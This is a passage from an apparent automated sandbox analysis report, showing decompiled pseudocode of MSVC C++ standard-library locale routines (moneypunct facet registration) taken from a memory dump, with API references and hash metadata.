																_t445 =  *0x6e286ddc;
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6E1A161C(0x6e286d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6E1C66BA(_t462 - 0x14);
																	return E6E1E0075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6E1D1409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t462 - 0x20);
																			E6E1E3D74(_t462 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t327, _t434, _t445, 0x14);
																			E6E1C6653(_t462 - 0x14, 0);
																			_t446 =  *0x6e286de0;
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6E1A161C(0x6e286d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6E1C66BA(_t462 - 0x14);
																				return E6E1E0075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6E1D1471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t462 - 0x20);
																						E6E1E3D74(_t462 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t327, _t435, _t446, 0x14);
																						E6E1C6653(_t462 - 0x14, 0);
																						_t447 =  *0x6e286dfc;
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6E1A161C(0x6e286da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6E1C66BA(_t462 - 0x14);
																							return E6E1E0075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6E1D14EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t462 - 0x20);
																									E6E1E3D74(_t462 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t327, _t436, _t447, 0x14);
																									E6E1C6653(_t462 - 0x14, 0);
																									_t448 =  *0x6e286dcc;
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6E1A161C(0x6e286d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6E1C66BA(_t462 - 0x14);
																										return E6E1E0075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6E1D1558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t462 - 0x20);
																												E6E1E3D74(_t462 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t327, _t437, _t448, 0x14);
																												E6E1C6653(_t462 - 0x14, 0);
																												_t449 =  *0x6e286e00;
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6E1A161C(0x6e286dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6E1C66BA(_t462 - 0x14);
																													return E6E1E0075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6E1D15C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t462 - 0x20);
																															E6E1E3D74(_t462 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t327, _t438, _t449, 0x14);
																															E6E1C6653(_t462 - 0x14, 0);
																															_t450 =  *0x6e286dd0;
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6E1A161C(0x6e286d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6E1C66BA(_t462 - 0x14);
																																return E6E1E0075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6E1D162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6E1A1438(_t397);
																																		E6E1E3D74(_t462 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e22851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6e22c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6E1D542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6E1E0075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t439);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6e286dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6E1C6FD3(__eflags, _t438);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6e286e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6E1C6FD3(__eflags, _t437);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6e286dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6E1C6FD3(__eflags, _t436);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6e286dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6E1C6FD3(__eflags, _t435);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6e286de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6E1C6FD3(__eflags, _t434);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6e286ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6E1C6FD3(__eflags, _t433);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6e286db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6E1C6FD3(__eflags, _t432);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6e286dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6E1C6FD3(__eflags, _t431);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6e286dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6E1C6FD3(__eflags, _t430);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6e286dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF6C4
int.LIBCPMT ref: 6E1CF6DB

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF6FE
std::_Facet_Register.LIBCPMT ref: 6E1CF715
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF735
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF753

Strings

|m(n, xrefs: 6E1CF6CF

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |m(n
API String ID: 113178234-3086318270
Opcode ID: 25197f9397a88857f083b0c8dd9d6329fde63524569a4f24d6b8fd09e2c57c98
Instruction ID: 512abda1d356cdfaf4a93c21c39796c7a73f13f250d808cd22af9e887090983e
Opcode Fuzzy Hash: 25197f9397a88857f083b0c8dd9d6329fde63524569a4f24d6b8fd09e2c57c98
Instruction Fuzzy Hash: B5113A7591062C9FCF01DBD4C854AFEB77AAFA8B14F240408D020EB290CF7899C9E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t418 - 0x14, 0);
				_t399 =  *0x6e286dc4;
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6E1A161C(0x6e286d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6E1C66BA(_t418 - 0x14);
					return E6E1E0075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6E1D12B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t418 - 0x20);
							E6E1E3D74(_t418 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t389, _t399, 0x14);
							E6E1C6653(_t418 - 0x14, 0);
							_t400 =  *0x6e286dd8;
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6E1A161C(0x6e286d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6E1C66BA(_t418 - 0x14);
								return E6E1E0075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6E1D1339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t418 - 0x20);
										E6E1E3D74(_t418 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t296, _t390, _t400, 0x14);
										E6E1C6653(_t418 - 0x14, 0);
										_t401 =  *0x6e286db0;
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6E1A161C(0x6e286d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6E1C66BA(_t418 - 0x14);
											return E6E1E0075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6E1D13A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t418 - 0x20);
													E6E1E3D74(_t418 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t296, _t391, _t401, 0x14);
													E6E1C6653(_t418 - 0x14, 0);
													_t402 =  *0x6e286ddc;
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6E1A161C(0x6e286d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6E1C66BA(_t418 - 0x14);
														return E6E1E0075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6E1D1409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t418 - 0x20);
																E6E1E3D74(_t418 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t296, _t392, _t402, 0x14);
																E6E1C6653(_t418 - 0x14, 0);
																_t403 =  *0x6e286de0;
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6E1A161C(0x6e286d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6E1C66BA(_t418 - 0x14);
																	return E6E1E0075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6E1D1471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t418 - 0x20);
																			E6E1E3D74(_t418 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t296, _t393, _t403, 0x14);
																			E6E1C6653(_t418 - 0x14, 0);
																			_t404 =  *0x6e286dfc;
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6E1A161C(0x6e286da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6E1C66BA(_t418 - 0x14);
																				return E6E1E0075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6E1D14EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t418 - 0x20);
																						E6E1E3D74(_t418 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t296, _t394, _t404, 0x14);
																						E6E1C6653(_t418 - 0x14, 0);
																						_t405 =  *0x6e286dcc;
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6E1A161C(0x6e286d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6E1C66BA(_t418 - 0x14);
																							return E6E1E0075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6E1D1558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t418 - 0x20);
																									E6E1E3D74(_t418 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t296, _t395, _t405, 0x14);
																									E6E1C6653(_t418 - 0x14, 0);
																									_t406 =  *0x6e286e00;
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6E1A161C(0x6e286dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6E1C66BA(_t418 - 0x14);
																										return E6E1E0075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6E1D15C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t418 - 0x20);
																												E6E1E3D74(_t418 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t296, _t396, _t406, 0x14);
																												E6E1C6653(_t418 - 0x14, 0);
																												_t407 =  *0x6e286dd0;
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6E1A161C(0x6e286d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6E1A171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6E1C66BA(_t418 - 0x14);
																													return E6E1E0075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6E1D162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6E1A1438(_t359);
																															E6E1E3D74(_t418 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e22851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6e22c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6E1D542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6E1E0075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6E1C6FD3(__eflags, _t397);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6e286dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6E1C6FD3(__eflags, _t396);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6e286e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6E1C6FD3(__eflags, _t395);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6e286dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6E1C6FD3(__eflags, _t394);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6e286dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6E1C6FD3(__eflags, _t393);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6e286de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6E1C6FD3(__eflags, _t392);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6e286ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6E1C6FD3(__eflags, _t391);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6e286db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6E1C6FD3(__eflags, _t390);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6e286dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6E1C6FD3(__eflags, _t389);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6e286dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF760
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF76A
int.LIBCPMT ref: 6E1CF781

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF7A4
std::_Facet_Register.LIBCPMT ref: 6E1CF7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF7F9

Strings

xm(n, xrefs: 6E1CF775

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xm(n
API String ID: 113178234-949480937
Opcode ID: b32841da1a85d55f74ca9052fdea6d22bcc303f27cba5dda41a663d9a739a31e
Instruction ID: d94fd50739fe89a310836dca245b10711a3dca4ea934786211f9f8c8e8c259c0
Opcode Fuzzy Hash: b32841da1a85d55f74ca9052fdea6d22bcc303f27cba5dda41a663d9a739a31e
Instruction Fuzzy Hash: 64110A7591061D8BCF01DBD4C854AFDB7BAAF64B14F240909D520E73D0DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t770 - 0x14, 0);
				_t735 =  *0x6e286db8;
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6E1A161C(0x6e286d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6E1C66BA(_t770 - 0x14);
					return E6E1E0075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6E1D0F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t770 - 0x20);
							E6E1E3D74(_t770 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t717, _t735, 0x14);
							E6E1C6653(_t770 - 0x14, 0);
							_t736 =  *0x6e286dec;
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6E1A161C(0x6e286d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6E1A171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
